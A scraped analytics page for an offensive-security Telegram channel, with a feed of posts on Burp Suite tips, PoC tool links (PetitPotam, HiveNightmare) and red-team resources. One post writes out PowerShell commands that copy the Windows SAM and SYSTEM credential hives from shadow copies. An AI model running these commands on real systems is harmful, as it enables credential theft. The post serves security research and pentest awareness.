en
Feedback
APT

APT

Open in Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Show more

📈 Analytical overview of Telegram channel APT

Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 16 325 subscribers, ranking 7 749 in the Technologies & Applications category and 40 394 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 16 325 subscribers.

According to the latest data from 03 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 546 over the last 30 days and by 26 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 54.39%. Within the first 24 hours after publication, content typically collects 13.17% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 8 865 views. Within the first day, a publication typically gains 2 146 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 13.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Thanks to the high frequency of updates (latest data received on 04 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

16 325
Subscribers
+2624 hours
+917 days
+54630 days
Posts Archive
APT
16 325
WINDOWS LPE "HiveNightmare" or "SeriousSAM" CVE-2021-36934 The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating. 1) Check permissions: icacls.exe C:\Windows\System32\config\SAM 2) Check shadow copies, restore points [System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM') [System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM') [System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM') ... and so on 3) Copy SAM and SYSTEM files from shadow copy: [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM') [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')

APT
16 325
Plugin name: BurpBounty Scan Check Builder. It is fairly easy-to-use plugin. Install from BApp Store, create a check with sim
+2
Plugin name: BurpBounty Scan Check Builder. It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️

APT
16 325
#BurpHacksForBounties - Tip 19/30 Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in s
#BurpHacksForBounties - Tip 19/30 Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code. Using a plugin developed by @BurpBounty @egarme #infosec #appsec #burp #bugbountytips

APT
16 325
🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want. https://github.com/GossiTheDog/HiveNightmare #redteam #pentest #vuln #nightmare

APT
16 325

APT
16 325
1. Create a filter for intruder response. 2. Start the payload 3. If the response contains the string you entered in "grep" t
+1
1. Create a filter for intruder response. 2. Start the payload 3. If the response contains the string you entered in "grep" that will show up in an extra column. -> You can only focus on the response you are looking for.

APT
16 325
#BurpHacksForBounties - Day 18/30 Do you want to filter the responses in Burp Suite Intruder? And only show the ones which ha
#BurpHacksForBounties - Day 18/30 Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response? If yes try this 👇🏻 🧵 #appsec #infosec #bugbountytips #bugbountytip #burp

APT
16 325
PetitPotam PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function. https://github.com/topotam/PetitPotam #pentest #PetitPotam #rcp

APT
16 325
Auditing Docker Security https://youtu.be/mQkVB6KMHCg #docker #autdit #security

APT
16 325
Managing SSH Access at Scale with HashiCorp Vault Learn how to build scalable, role-based SSH access with SSH certificates an
Managing SSH Access at Scale with HashiCorp Vault Learn how to build scalable, role-based SSH access with SSH certificates and HashiCorp Vault. #vault

APT
16 325
Let see this for blogspot.com, this is a reverse proxy setting that checks subdomains and routes them accordingly, now let's
+1
Let see this for blogspot.com, this is a reverse proxy setting that checks subdomains and routes them accordingly, now let's change the host for it. IMG 1 : Target = Host IMG 2 : Target != Host, but still the request is routed through the host.

APT
16 325
#BurpHacksForBounties - Tip 16/30 Host Header Hacks with Burp Suite's repeater. For webserver, serving requests through rever
#BurpHacksForBounties - Tip 16/30 Host Header Hacks with Burp Suite's repeater. For webserver, serving requests through reverse proxy, don't forget to try this technique out. Learnt from @lbinowax Quick read and How to 👇🏼 #infosec #appsec #burp #bugbounties #bugbountytips

APT
16 325
Reconflow This is all in one tool for gathering reconnaissance information about a target without the hassle of installing multiple tools and their dependencies & also presents you the results to your telegram chat. https://github.com/adarshshetty18/reconflow #recon #bugbounty #telegram

APT
16 325
Nim on the Attack Process Injection Using Nim and the Windows API https://huskyhacks.dev/2021/07/17/nim-exploit-dev/ #redteam #winapi #injection #nim

APT
16 325
WiFiDemon iOS WiFi RCE 0-Day Vulnerability & a 'Zero-Click' Vulnerability That was Silently Patched https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/ #0day #ios #rce

APT
16 325
#BurpHacksForBounties - Day 15/30 Macros in Burp Suite by akshita_infosec. I could not have explained it better than she did. Nice work :) https://akshita-infosec.medium.com/burp-macros-what-why-how-151df8901641 #infosec #appsec #bugbounties #bugbountytips #burp

APT
16 325
Remote Code Execution in cdnjs of CloudFlare https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/ #RCE #cdnjs #cloudflare

APT
16 325
Basic hacking tools cheat-sheet #infosec #security #webapp #appsec #cybersecurity
Basic hacking tools cheat-sheet #infosec #security #webapp #appsec #cybersecurity

APT
16 325
Port Forwarding & Tunnelling Cheatsheet https://www.hackingarticles.in/port-forwarding-tunnelling-cheatsheet/ #infosec #ctf #oscp #pentest #cybersecurity